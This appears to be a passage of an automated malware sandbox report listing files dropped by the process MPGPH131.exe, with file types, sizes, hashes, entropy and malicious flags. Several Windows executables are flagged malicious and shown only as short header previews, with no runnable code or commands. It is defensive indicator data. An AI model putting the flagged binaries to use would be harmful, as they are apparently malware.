                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1755136
                                                                                                                                                                                  Entropy (8bit):7.944061716574701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:4+5L+Qg75yHWPUqbVpWlBRd1jcOHmf0FqSoYR2DPoWq:4+dFHWPS/Rd1IY4hoV
                                                                                                                                                                                  MD5:FA2940984475E3DD89E37F15DBE8A88F
                                                                                                                                                                                  SHA1:C7CFA3A0F500441CE22EF72BBD9BE7988F07C4D3
                                                                                                                                                                                  SHA-256:04BA7F7A64595085447F1D659F91D98693E53333F323EC7826A0E0D03918B626
                                                                                                                                                                                  SHA-512:C30C965067519BF3B172362AA5DF510FE867CAFE14BED875049F984B18018801119BD334B4ED49ED63E93D11F2A4C8D2397024D41328471E842445497B43F49C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$e.........."...0..$............E.. ...`....@.. ........................F.....}H....`.................................m........`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........6..............@... ..*..........8..............@...odmizeae.....@+......:..............@...wjrksujl. ....E.....................@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):917504
                                                                                                                                                                                  Entropy (8bit):6.5798614215687845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaKTx:MqDEvCTbMWu7rQYlBQcBiT6rprG8aax
                                                                                                                                                                                  MD5:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  SHA1:C775259EB2B550BA7A9C49A12138562D9753D450
                                                                                                                                                                                  SHA-256:11E7D4527918A37E28F345ACF4A6E6AE7665D7D204543232E9400F92C58CB367
                                                                                                                                                                                  SHA-512:C0987C12B294CF37FF40F45EFF08F32A3A7F806B6A3C968832C5A2A44AEAE92AF32F229A8C5D5B60C806C8B6FC9AB1C411EC45C18AFC4D4F4675ED73F4B8E186
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e.........."..........P......w.............@..........................`............@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....`......$............@......................................@... .. .... .. .......... `.......l..x....0..h....................`.......................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@............0...p.......b..............@....................d...b..............@....rsrc....0...0...0..................@..@..........x..`...(..................@....data.....!..0....!.................@...................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1166336
                                                                                                                                                                                  Entropy (8bit):7.03555490248727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSe2+b+HdiJUC:NTvC/MTQYxsWR7aSe2+b+HoJU
                                                                                                                                                                                  MD5:BA8A470327E60DD9B1CC33B37B5FA8B7
                                                                                                                                                                                  SHA1:2B540D9587B66C173834093045604CF42AEFDCD6
                                                                                                                                                                                  SHA-256:7080E78161D06FED8CD87E3CF5F3B087C15F5E07561FC413F65D86FE73529A46
                                                                                                                                                                                  SHA-512:F9BC2346917751B2AED22E4B9810539513431FC5B70A2BAB0054C2C6831C9C8EF8B06453749E57E6F52BF66C083C457F39231E3B57BB6BA93B7096DBD44E4FA0
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......e..........".................w.............@..........................0.......*....@...@.......@.....................d...|....@..xa.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...xa...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2399744
                                                                                                                                                                                  Entropy (8bit):7.962349167063599
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:nBeLY5wqsk2vUnzPT7uc1eb0MmZEazB2XP3Oxc1tHTf:wIt0vcrT7ucAvm90fG
                                                                                                                                                                                  MD5:0EC84D886E773CBA442A61606DF14F06
                                                                                                                                                                                  SHA1:404EFBEAE6B921DCFC1FBE5B90EE47E5FB7B8038
                                                                                                                                                                                  SHA-256:B29798AA1B8E46207A37CCD73613B87BC8F2A6D50774D0079CF7AB341B1EBB3D
                                                                                                                                                                                  SHA-512:5C026CDC1752F026D37AF3619E78565EDC8896DA35D65B373042D200A7C95003518B01D825B5101CD013F7F142505B5F1328D177202C3F76489C1BF787238A52
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..........PE..L......e...............".....V........\...........@...........................\.....}.$...@.................................W...k....`...C.......................................................................................................... . .P..........................@....rsrc....C...`......................@....idata ............................@... ..-.........................@...gakjennq.p...@A..j..................@...brsozmps......\......x$.............@....taggant.0....\.."...|$.............@...................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
